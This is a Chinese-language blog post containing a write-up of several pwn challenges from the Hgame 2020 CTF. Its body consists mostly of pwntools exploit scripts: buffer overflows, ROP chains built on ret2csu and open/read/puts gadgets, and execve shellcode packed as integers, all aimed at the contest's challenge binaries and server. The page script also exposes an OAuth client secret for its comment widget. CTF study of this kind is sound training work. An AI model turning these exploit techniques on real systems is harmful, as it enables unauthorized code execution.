<!DOCTYPE html>
<html lang="zh-CN">





<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/avatar.png">
  <link rel="icon" type="image/png" href="/img/logo.png">
  <meta name="viewport"
        content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="description" content="">
  <meta name="author" content="Mr.BelieVe">
  <meta name="keywords" content="">
  <title>Hgame - Mr.BelieVe&#39;s Treasure</title>

  <link  rel="stylesheet" href="https://cdn.staticfile.org/font-awesome/5.12.1/css/all.min.css" />
<link  rel="stylesheet" href="https://cdn.staticfile.org/twitter-bootstrap/4.4.1/css/bootstrap.min.css" />
<link  rel="stylesheet" href="https://cdn.staticfile.org/mdbootstrap/4.13.0/css/mdb.min.css" />
<link  rel="stylesheet" href="https://cdn.staticfile.org/github-markdown-css/3.0.1/github-markdown.min.css" />

<link rel="stylesheet" href="//at.alicdn.com/t/font_1067060_qzomjdt8bmp.css">



  <link  rel="stylesheet" href="/lib/prettify/tomorrow-night-eighties.min.css" />

<link  rel="stylesheet" href="/css/main.css" />


  <link defer rel="stylesheet" href="https://cdn.staticfile.org/fancybox/3.5.7/jquery.fancybox.min.css" />


<!-- 自定义样式保持在最底部 -->


<meta name="generator" content="Hexo 4.2.0"></head>


<body>
  <header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand"
       href="/">&nbsp;<strong>Mr.BelieVe's Treasure</strong>&nbsp;</a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
          <li class="nav-item">
            <a class="nav-link" href="/">首页</a>
          </li>
        
          
          
          
          
          <li class="nav-item">
            <a class="nav-link" href="/archives/">归档</a>
          </li>
        
          
          
          
          
          <li class="nav-item">
            <a class="nav-link" href="/categories/">分类</a>
          </li>
        
          
          
          
          
          <li class="nav-item">
            <a class="nav-link" href="/tags/">标签</a>
          </li>
        
          
          
          
          
          <li class="nav-item">
            <a class="nav-link" href="/about/">关于</a>
          </li>
        
          
          
          
          
          <li class="nav-item">
            <a class="nav-link" href="/links/">友链</a>
          </li>
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" data-toggle="modal" data-target="#modalSearch">&nbsp;&nbsp;<i
                class="iconfont icon-search"></i>&nbsp;&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

    <div class="view intro-2" id="background" parallax=true
         style="background: url('/img/default.png') no-repeat center center;
           background-size: cover;">
      <div class="full-bg-img">
        <div class="mask rgba-black-light flex-center">
          <div class="container text-center white-text fadeInUp">
            <span class="h2" id="subtitle">
              
            </span>

            
              
                <p class="mt-3 post-meta">
                  <i class="fas fa-calendar-alt" aria-hidden="true"></i>
                  星期二, 一月 28日 2020, 10:26 上午
                </p>
              

              <p class="mt-1">
                
                  
                  <span class="post-meta">
                    <i class="far fa-chart-bar"></i>
                    1.2k 字
                  </span>
                

                
                  
                  <span class="post-meta">
                      <i class="far fa-clock"></i>
                      6 分钟
                  </span>
                

                
              </p>
            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

<div class="container-fluid">
  <div class="row">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-md">
      <div class="container nopadding-md" id="board-ctn">
        <div class="py-5 z-depth-3" id="board">
          <div class="post-content mx-auto" id="post">
            
            <div class="markdown-body">
              <h1 id="Hgame2020"><a href="#Hgame2020" class="headerlink" title="Hgame2020"></a>Hgame2020</h1><h2 id="Hard-AAAAA"><a href="#Hard-AAAAA" class="headerlink" title="Hard_AAAAA"></a>Hard_AAAAA</h2><img src="/2020/01/28/Hgame/image-20200116233004577.png" srcset="/img/loading.gif" class="" title="image-20200116233004577">

<img src="/2020/01/28/Hgame/image-20200116233016869.png" srcset="/img/loading.gif" class="" title="image-20200116233016869">

<p>V5在-0x31，s在-0xAC</p>
<pre><code class="python">sh.recvuntil(&quot;Let&#39;s 0O0o\\0O0!&quot;)
payload=&quot;a&quot;*(0xAC - 0x31)
payload += &#39;0O0o\x00O0&#39;
sh.send(payload)
sh.interactive()</code></pre>
<h2 id="One-Shot"><a href="#One-Shot" class="headerlink" title="One_Shot"></a>One_Shot</h2><img src="/2020/01/28/Hgame/image-20200117005607628.png" srcset="/img/loading.gif" class="" title="image-20200117005607628">

<img src="/2020/01/28/Hgame/image-20200117005622807.png" srcset="/img/loading.gif" class="" title="image-20200117005622807">

<p>0xE0 - 0xC0之后刚好是32位，这样第</p>
<pre><code class="python">payload = cyclic(0xE0 - 0xC0)
sh.send(payload)
sh.recvuntil(&quot;shot!\n&quot;)
payload = str(6295776)
sh.send(payload)</code></pre>
<h2 id="ROP-LEVEL0"><a href="#ROP-LEVEL0" class="headerlink" title="ROP_LEVEL0"></a>ROP_LEVEL0</h2><h2 id="open-read-puts"><a href="#open-read-puts" class="headerlink" title="open_read_puts"></a>open_read_puts</h2><pre><code class="python"># -*- coding: utf-8 -*-
from pwn import *
context.log_level = &#39;debug&#39;
context.arch = &#39;amd64&#39;
elf = ELF(&#39;./ROP_LEVEL0&#39;)
lib = 0
sh = 0
def pwn(ip,port,debug):
    global lib
    global sh
    if debug == 1:
        sh = process(&#39;./ROP_LEVEL0&#39;)
        lib = ELF(&#39;/lib/x86_64-linux-gnu/libc.so.6&#39;)
    else:
        sh = remote(ip,port)
        lib = ELF(&#39;/lib/x86_64-linux-gnu/libc.so.6&#39;)
        #lib = ELF(&#39;./home/robye/Desktop/PWN/libc/64-libc-2.27.so&#39;)
    pop_rsi_r15_ret = 0x400751 
    pop_rdi_ret = 0x400753
    buf = 0x601060
    open_plt = elf.plt[&#39;open&#39;]
    open_addr = 0x4006A3
    payload = cyclic(0x50+ 8)
    payload += p64(pop_rsi_r15_ret)
    payload += p64(elf.bss()+0x100)
    payload += p64(0xdeadbeef)
    payload += p64(elf.plt[&#39;read&#39;])

    payload += p64(pop_rdi_ret)
    payload += p64(elf.bss()+0x100)
    payload += p64(pop_rsi_r15_ret)
    payload += p64(0)
    payload += p64(0)
    payload += p64(elf.plt[&#39;open&#39;])
    payload += p64(pop_rdi_ret)
    payload += p64(6)
    payload += p64(pop_rsi_r15_ret)
    payload += p64(elf.bss()+0x100)
    payload += p64(0)
    payload += p64(elf.plt[&#39;read&#39;])
    payload += p64(pop_rdi_ret)
    payload += p64(elf.bss()+0x100)
    payload += p64(0x4004e0)#puts_plt
    sh.sendline(payload)
    sleep(0.5)
    sh.recvuntil(&quot;./flag&quot;)
    sh.send(&quot;./flag\x00&quot;)
    sh.interactive()
if __name__ ==  &quot;__main__&quot;:
    pwn(&quot;47.103.214.163&quot;,20003,1 )
</code></pre>
<h2 id="ret2csu"><a href="#ret2csu" class="headerlink" title="ret2csu"></a>ret2csu</h2><img src="/2020/01/28/Hgame/image-20200117183339217.png" srcset="/img/loading.gif" class="" title="image-20200117183339217">

<p>ROP_LEVEL0| SOLVED| ww        <img src="/2020/01/28/Hgame/92YAf7bVfc8a3fUf__thumbnail" srcset="/img/loading.gif" class="" title="img">      重复利用此处的gadget调用read， open， puts将flag输出就行</p>
<pre><code class="python"> 1 #!/usr/bin/python2
  2 
  3 from pwn import *
  4 import sys
  5 import os
  6 
  7 #context(arch=&#39;amd64&#39;, os=&#39;linux&#39;, terminal=[&#39;tmux&#39;, &#39;splitw&#39;, &#39;-h&#39;])
  8 context(arch=&#39;i386&#39;, os=&#39;linux&#39;, terminal=[&#39;tmux&#39;, &#39;splitw&#39;, &#39;-h&#39;])
  9 context.log_level=&#39;debug&#39;
 10 debug = 0
 11 d = 1
 12 
 13 def pwn():
 14     execve = &quot;./ROP_LEVEL0&quot;
 15     if debug == 1:
 16         p = process(execve)
 17         if d == 1:
 18             gdb.attach(p)
 19     else:


 20         #ip = &quot;10.0.%s.140&quot; % sys.argv[1]
 21         ip = &quot;47.103.214.163&quot;
 22         host = &quot;20003&quot;
 23         p = remote(ip, host)
 24 
 25     elf = ELF(&quot;./ROP_LEVEL0&quot;)
 26 
 27     main = 0x40065B
 28     loc1 = 0x400730
 29     loc2 = 0x40074A
 30 
 31     payload = &#39;\x00&#39;*(0x50+8) + p64(loc2)
 32     payload += p64(0) + p64(1) + p64(elf.got[&#39;read&#39;]) + p64(0x10) + p64(elf.bss()+0x200) + p64(0) + p64(loc1)
 33     payload += p64(0)*7 + p64(main)
 34     p.sendafter(&quot;You can not only cat flag but also Opxx Rexx Wrxxx ./flag&quot;, payload.ljust(0x100, &#39;\x00&#39;))
 35 
 36     p.sendline(&#39;./flag\0&#39;)
 37 
 38     payload = &#39;\x00&#39;*(0x50+8) + p64(loc2)
 39     payload += p64(0) + p64(1) + p64(elf.got[&#39;open&#39;]) + p64(0)*2 + p64(elf.bss()+0x200) + p64(loc1)
 40     payload += p64(0)*7 + p64(main)
 41     p.sendafter(&quot;You can not only cat flag but also Opxx Rexx Wrxxx ./flag&quot;, payload.ljust(0x100, &#39;\x00&#39;))
 42 
 43     raw_input()
 44     payload = &#39;\x00&#39;*(0x50+8) + p64(loc2)
 45     payload += p64(0) + p64(1) + p64(elf.got[&#39;read&#39;]) + p64(0x60) + p64(elf.bss()+0x220) + p64(5) + p64(loc1)
 46     payload += p64(0)*7 + p64(main)
 47     p.sendafter(&quot;You can not only cat flag but also Opxx Rexx Wrxxx ./flag&quot;, payload.ljust(0x100, &#39;\x00&#39;))
 48 
 49     payload = &#39;\x00&#39;*(0x50+8) + p64(loc2)
 50     payload += p64(0) + p64(1) + p64(elf.got[&#39;puts&#39;]) + p64(0)*2 + p64(elf.bss() + 0x220) + p64(loc1)
 51     payload += p64(0)*7 + p64(main)
 52     p.sendafter(&quot;You can not only cat flag but also Opxx Rexx Wrxxx ./flag&quot;, payload.ljust(0x100, &#39;\x00&#39;))
 53 
 54     p.interactive()
 55 
 56 if __name__ == &#39;__main__&#39;:
 57     pwn()</code></pre>
<p><a href="http://www.qfrost.com:4000/PWN/万能gadget/" target="_blank" rel="noopener">http://www.qfrost.com:4000/PWN/%E4%B8%87%E8%83%BDgadget/</a></p>
<h2 id="Number-Killer"><a href="#Number-Killer" class="headerlink" title="Number_Killer"></a>Number_Killer</h2><pre><code class="c">#include &lt;stdio.h&gt;
#include &lt;stdlib.h&gt;
int main(void) { 
    //char str[20];
    long str = 0x40078d;
    long temp;
    long number = 4196237L;
    char string[20];
    temp = atol(str);
    printf(&quot;十进制：%d&quot;,str);
    //printf(&quot;转换前：%s ,转换后：%d\n&quot;,str,atol(str));
    temp = number;
    itoa(number, string, 16);
    //printf(&quot;转换前：%d,转换后：%s&quot;,temp,string);
    return 0;
}</code></pre>
<img src="/2020/01/28/Hgame/image-20200127180305749.png" srcset="/img/loading.gif" class="" title="image-20200127180305749">

<img src="/2020/01/28/Hgame/image-20200127180319641.png" srcset="/img/loading.gif" class="" title="image-20200127180319641">

<img src="/2020/01/28/Hgame/image-20200127180517996.png" srcset="/img/loading.gif" class="" title="image-20200127180517996">

<img src="/2020/01/28/Hgame/image-20200127180441992.png" srcset="/img/loading.gif" class="" title="image-20200127180441992">

<p>没有NX加上有jump rsp，那就肯定ret2shellcode</p>
<p>因为atoll，所以不能直接发shellcode</p>
<p>先看一下偏移</p>
<pre><code class="python">for i in range(20):
    sh.sendline(str(i))
    sleep(0.1)</code></pre>
<img src="/2020/01/28/Hgame/image-20200127181655275.png" srcset="/img/loading.gif" class="" title="image-20200127181655275">

<p>看见c,d,e,f,那里，再测一次</p>
<pre><code class="python">for i in range(1,13):
    sh.sendline(str(i))
    sleep(0.1)</code></pre>
<img src="/2020/01/28/Hgame/image-20200127184537470.png" srcset="/img/loading.gif" class="" title="image-20200127184537470">

<p>现在我们还看见了一个1，可能是用来记录循环次数的？</p>
<p>然后我们要构建栈，就得按照</p>
<pre><code class="python">gadget = [
        0,
        0x000000000040078D,#jmp rsp
        0x622fbf4856f63148,#shellcode
        0x545768732f2f6e69,
        0x0000050f993bb05f,
]
</code></pre>
<p>这样来构建</p>
<blockquote>
<img src="/2020/01/28/Hgame/image-20200127191618340.png" srcset="/img/loading.gif" class="" title="image-20200127191618340">
</blockquote>
<img src="/2020/01/28/Hgame/image-20200127193319645.png" srcset="/img/loading.gif" class="" title="image-20200127193319645">

<p>这样我们看见那个0，好像放在了最下面，并且栈中还存留有56789a，所以把gadget修改一下</p>
<pre><code class="python">gadget = [
        0xdeadbeef,
        0x000000000040078D,#jmp rsp
        0x622fbf4856f63148,#shellcode
        0x545768732f2f6e69,
        0x0000050f993bb05f,
        0xdeadbeef,
        0xdeadbeef,
        0xdeadbeef,
        0xdeadbeef,
        0xdeadbeef,
        0xdeadbeef,
]</code></pre>
<img src="/2020/01/28/Hgame/image-20200127194207809.png" srcset="/img/loading.gif" class="" title="image-20200127194207809">

<p>这样就没有问题啦，然后就是如何退出循环了</p>
<p>这里我们可以看见循环次数已经变成了b<img src="/2020/01/28/Hgame/image-20200127195248873.png" srcset="/img/loading.gif" class="" title="image-20200127195248873"></p>
<p>但如果我们继续发送的话，又会变成1<img src="/2020/01/28/Hgame/image-20200127200302561.png" srcset="/img/loading.gif" class="" title="image-20200127200302561"></p>
<p>经过调试之后，只有<code>sendNum((11&lt;&lt;32))</code>可以将b+1变成c，否则会重新开始循环打乱栈内布局</p>
<p>随后，发送</p>
<pre><code class="python">for i in range(12,20):
    sendNum(i)</code></pre>
<img src="/2020/01/28/Hgame/image-20200127202553944.png" srcset="/img/loading.gif" class="" title="image-20200127202553944">

<p>然后发现立马就可以运行第一行…..</p>
<p>我们需要把rbp指针指向之前我们放好了的地方，所以计算一下栈偏移，然后</p>
<pre><code class="python">a = asm(&#39;sub rsp,0x60;ret&#39;)
b = disasm(a)</code></pre>
<img src="/2020/01/28/Hgame/image-20200127205156957.png" srcset="/img/loading.gif" class="" title="image-20200127205156957">

<p>所以发送<code>sendNum(0xc360ec8348)</code>再使用gitf里的<img src="/2020/01/28/Hgame/image-20200127205325792.png" srcset="/img/loading.gif" class="" title="image-20200127205325792"></p>
<p>完成跳转</p>
<p>随后，程序还需要读入六个数，然后即可</p>
<pre><code class="python">from pwn import *
context.log_level = &quot;debug&quot;
context.arch = &quot;amd64&quot;
sh = process(&quot;./Number_Killer&quot;)

sh.recvuntil(&quot;numbers!\n&quot;)
gadget = [
        0xdeadbeef,
        0x000000000040078D,#jmp rsp
        0x622fbf4856f63148,#shellcode
        0x545768732f2f6e69,
        0x0000050f993bb05f,
        0xdeadbeef,
        0xdeadbeef,
        0xdeadbeef,
        0xdeadbeef,
        0xdeadbeef,
        0xdeadbeef,
]

def sendNum(num):
    sh.sendline(str(num))
    sleep(0.1)
for i in range(11):
    sh.sendline(str(i))
    sleep(0.1)
for i in gadget:
    sendNum(i)
#pause()
sendNum((11&lt;&lt;32))
pause()
sendNum(0xc360ec8348)
sendNum(0x400789)
for i in range(6):
    sh.sendline(str(i))
    sleep(0.1)
sh.interactive()</code></pre>

            </div>
            <hr>
            <div>
              <p>
                
                  <span>
                <i class="iconfont icon-inbox"></i>
                    
                      <a class="hover-with-bg" href="/categories/CTF/">CTF</a>
                      &nbsp;
                    
                      <a class="hover-with-bg" href="/categories/CTF/Hgame/">Hgame</a>
                      &nbsp;
                    
                  </span>&nbsp;&nbsp;
                
                
              </p>
              
                <p class="note note-warning">本博客所有文章除特别声明外，均采用 <a href="https://zh.wikipedia.org/wiki/Wikipedia:CC_BY-SA_3.0%E5%8D%8F%E8%AE%AE%E6%96%87%E6%9C%AC" target="_blank" rel="nofollow noopener noopener">CC BY-SA 3.0协议</a> 。转载请注明出处！</p>
              
              
                <div class="post-prevnext row">
                  <div class="post-prev col-6">
                    
                    
                      <a href="/2020/01/28/pwn_by_examples/">
                        <i class="fa fa-chevron-left"></i>
                        <span class="hidden-mobile">pwn_by_examples</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </div>
                  <div class="post-next col-6">
                    
                    
                      <a href="/2020/01/25/ciscn_2019_s_9/">
                        <span class="hidden-mobile">ciscn_2019_s_9</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="fa fa-chevron-right"></i>
                      </a>
                    
                  </div>
                </div>
              
            </div>

              
                <!-- Comments -->
                <div class="comments" id="comments">
                  
                  
  <div id="gitalk-container"></div>
  <link rel="stylesheet" href="https://unpkg.com/gitalk/dist/gitalk.css">
  <script defer src="https://unpkg.com/gitalk/dist/gitalk.min.js"></script>
  <script defer src="https://cdn.jsdelivr.net/npm/blueimp-md5@2.11.1/js/md5.min.js"></script>
  <script type="text/javascript">
    var oldLoad = window.onload;
    window.onload = function () {
      var gitalk = new Gitalk({
        clientID: 'c16704b33f7cc977ea90',
        clientSecret: '9f8ad5600be82be115466ef0daf0f8a24a7b2da1',
        repo: 'mrbelieve128.github.io',
        owner: 'mrbelieve128.github.io',
        admin: 'mrbelieve128',
        id: md5(location.pathname),
        language: 'zh-CN',
        perPage: 15,
        pagerDirection: 'last',
        createIssueManually: 'true',
        distractionFreeMode: 'false'
      });

      gitalk.render('gitalk-container')
      oldLoad && oldLoad();
    }
  </script>


                </div>
              
          </div>
        </div>
      </div>
    </div>
    
      <div class="d-none d-lg-block col-lg-2 toc-container" id="toc-ctn">
        <div id="toc-start"></div>
<div id="toc">
  <p class="h5"><i class="far fa-list-alt"></i>&nbsp;目录</p>
  <div id="tocbot"></div>
</div>

      </div>
    
  </div>
</div>

<!-- Custom -->


    
  </main>

  
    <a class="z-depth-1" id="scroll-top-button" href="#" role="button">
      <i class="fa fa-chevron-up scroll-top-arrow" aria-hidden="true"></i>
    </a>
  

  
    <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v"
                 for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
  

  

  

  <footer class="mt-5">
  <div class="text-center py-3">
    <div>
      <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><b>Hexo</b></a>
      <i class="iconfont icon-love"></i>
      <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"> <b>Fluid</b></a>
    </div>
    
  <div>
    
      <!-- 不蒜子统计PV -->
      
      <span id="busuanzi_container_site_pv" style="display: none">
      总访问量 <span id="busuanzi_value_site_pv"></span> 次
    </span>
    
    
      <!-- 不蒜子统计UV -->
      
      <span id="busuanzi_container_site_uv" style="display: none">
      总访客数 <span id="busuanzi_value_site_uv"></span> 人
    </span>
    
  </div>


    

    
  </div>
</footer>

<!-- SCRIPTS -->
<script  src="https://cdn.staticfile.org/jquery/3.4.1/jquery.min.js" ></script>
<script  src="https://cdn.staticfile.org/popper.js/1.16.1/umd/popper.min.js" ></script>
<script  src="https://cdn.staticfile.org/twitter-bootstrap/4.4.1/js/bootstrap.min.js" ></script>
<script  src="https://cdn.staticfile.org/mdbootstrap/4.13.0/js/mdb.min.js" ></script>
<script  src="/js/main.js" ></script>


  <script  src="/js/lazyload.js" ></script>



  
  <script  src="https://cdn.staticfile.org/tocbot/4.10.0/tocbot.min.js" ></script>
  <script>
    $(document).ready(function () {
      var navHeight = $('#navbar').height();
      var toc = $('#toc');
      var boardCtn = $('#board-ctn');
      var boardTop = boardCtn.offset().top;
      var tocLimMax = 2 * boardTop + boardCtn.height();

      $(window).scroll(function () {
        var tocLimMin = $('#toc-start').offset().top - navHeight;
        var scroH = document.body.scrollTop + document.documentElement.scrollTop;

        if (tocLimMin <= scroH && scroH <= tocLimMax) {
          toc.css({
            'display': 'block',
            'position': 'fixed',
            'top': navHeight,
          });
        } else if (scroH <= tocLimMin) {
          toc.css({
            'position': '',
            'top': '',
          });
        } else if (scroH > tocLimMax) {
          toc.css('display', 'none');
        }
      });
      tocbot.init({
        tocSelector: '#tocbot',
        contentSelector: '.post-content',
        headingSelector: 'h1,h2,h3,h4,h5,h6',
        linkClass: 'tocbot-link',
        activeLinkClass: 'tocbot-active-link',
        listClass: 'tocbot-list',
        isCollapsedClass: 'tocbot-is-collapsed',
        collapsibleClass: 'tocbot-is-collapsible',
        scrollSmooth: true,
        headingsOffset: -boardTop
      });
      if ($('.toc-list-item').length > 0) {
        $('#toc > p').css('visibility', 'visible');
      }
      var offset = boardCtn.css('margin-right')
      $('#toc-ctn').css({
        'right': offset
      })
    });
  </script>





  <script defer src="https://cdn.staticfile.org/clipboard.js/2.0.6/clipboard.min.js" ></script>
  <script  src="/js/clipboard-use.js" ></script>



  <script defer src="https://cdn.staticfile.org/smoothscroll/1.4.10/SmoothScroll.min.js" ></script>



  <script defer src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" ></script>




<!-- Plugins -->



  <script  src="https://cdn.staticfile.org/prettify/188.0.0/prettify.min.js" ></script>
  <script>
    $(document).ready(function () {
      $('pre').addClass('prettyprint  linenums');
      prettyPrint();
    })
  </script>



  <script  src="https://cdn.staticfile.org/typed.js/2.0.11/typed.min.js" ></script>
  <script>
    var typed = new Typed('#subtitle', {
      strings: [
        '  ',
        "Hgame&nbsp;",
      ],
      cursorChar: "_",
      typeSpeed: 70,
      loop: false,
    });
    typed.stop();
    $(document).ready(function () {
      $(".typed-cursor").addClass("h2");
      typed.start();
    });
  </script>



  <script  src="https://cdn.staticfile.org/anchor-js/4.2.2/anchor.min.js" ></script>
  <script>
    anchors.options = {
      placement: "right",
      visible: "hover",
      
    };
    var el = "h1,h2,h3,h4,h5,h6".split(",");
    var res = [];
    for (item of el) {
      res.push(".markdown-body > " + item)
    }
    anchors.add(res.join(", "))
  </script>



  <script  src="/js/local-search.js" ></script>
  <script>
    var path = "/local-search.xml";
    var inputArea = document.querySelector("#local-search-input");
    inputArea.onclick = function () {
      getSearchFile(path);
      this.onclick = null
    }
  </script>



  <script defer src="https://cdn.staticfile.org/fancybox/3.5.7/jquery.fancybox.min.js" ></script>
  <script>
    $("#post img:not(.no-zoom img, img[no-zoom])").each(
      function () {
        var element = document.createElement("a");
        $(element).attr("data-fancybox", "images");
        $(element).attr("href", $(this).attr("src"));
        $(this).wrap(element);
      }
    );
  </script>





  
  
    <script>
      !function (e, t, a) {
        function r() {
          for (var e = 0; e < s.length; e++) s[e].alpha <= 0 ? (t.body.removeChild(s[e].el), s.splice(e, 1)) : (s[e].y--, s[e].scale += .004, s[e].alpha -= .013, s[e].el.style.cssText = "left:" + s[e].x + "px;top:" + s[e].y + "px;opacity:" + s[e].alpha + ";transform:scale(" + s[e].scale + "," + s[e].scale + ") rotate(45deg);background:" + s[e].color + ";z-index:99999");
          requestAnimationFrame(r)
        }

        function n() {
          var t = "function" == typeof e.onclick && e.onclick;
          e.onclick = function (e) {
            t && t(), o(e)
          }
        }

        function o(e) {
          var a = t.createElement("div");
          a.className = "heart", s.push({
            el: a,
            x: e.clientX - 5,
            y: e.clientY - 5,
            scale: 1,
            alpha: 1,
            color: c()
          }), t.body.appendChild(a)
        }

        function i(e) {
          var a = t.createElement("style");
          a.type = "text/css";
          try {
            a.appendChild(t.createTextNode(e))
          } catch (t) {
            a.styleSheet.cssText = e
          }
          t.getElementsByTagName("head")[0].appendChild(a)
        }

        function c() {
          return "rgb(" + ~~(255 * Math.random()) + "," + ~~(255 * Math.random()) + "," + ~~(255 * Math.random()) + ")"
        }

        var s = [];
        e.requestAnimationFrame = e.requestAnimationFrame || e.webkitRequestAnimationFrame || e.mozRequestAnimationFrame || e.oRequestAnimationFrame || e.msRequestAnimationFrame || function (e) {
          setTimeout(e, 1e3 / 60)
        }, i(".heart{width: 10px;height: 10px;position: fixed;background: #f00;transform: rotate(45deg);-webkit-transform: rotate(45deg);-moz-transform: rotate(45deg);}.heart:after,.heart:before{content: '';width: inherit;height: inherit;background: inherit;border-radius: 50%;-webkit-border-radius: 50%;-moz-border-radius: 50%;position: fixed;}.heart:after{top: -5px;}.heart:before{left: -5px;}"), n(), r()
      }(window, document);
    </script>
  








</body>
</html>
